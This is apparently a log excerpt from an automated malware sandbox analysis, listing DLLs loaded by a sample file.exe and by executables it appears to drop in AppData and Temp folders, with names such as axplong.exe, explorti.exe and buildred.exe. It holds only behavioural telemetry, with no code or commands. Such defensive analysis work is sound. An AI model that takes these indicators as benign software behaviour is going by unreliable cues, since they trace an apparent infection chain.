Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=6684 --field-trial-handle=2680,i,8259539397810858714,2629132827171544738,262144 /prefetch:8
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: pcacli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingBKKFHIEGDH.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\RoamingAEGIJKEHCA.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000025001\PharmaciesDetection.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: msvcr100.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\1000002001\ba77748b9b.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: msisip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: wshext.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: appxsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: opcservices.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: esdsip.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: sxs.dll
Source: C:\Users\user\AppData\Local\Temp\1000027001\buildred.exe	Section loaded: mpr.dll
